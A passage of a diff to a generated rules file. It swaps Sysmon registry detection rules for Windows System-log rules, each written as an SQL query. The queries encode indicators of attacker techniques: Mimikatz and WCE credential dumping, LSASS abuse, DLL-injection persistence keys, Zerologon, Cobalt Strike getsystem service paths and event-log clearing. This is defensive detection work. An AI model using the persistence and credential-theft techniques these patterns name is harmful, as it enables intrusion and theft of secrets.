'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_exploit_cve_2021_42287.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "falsepositives": [ - "Unknown" + "attack.t1210", + "attack.lateral_movement" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.privilege_escalation" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE 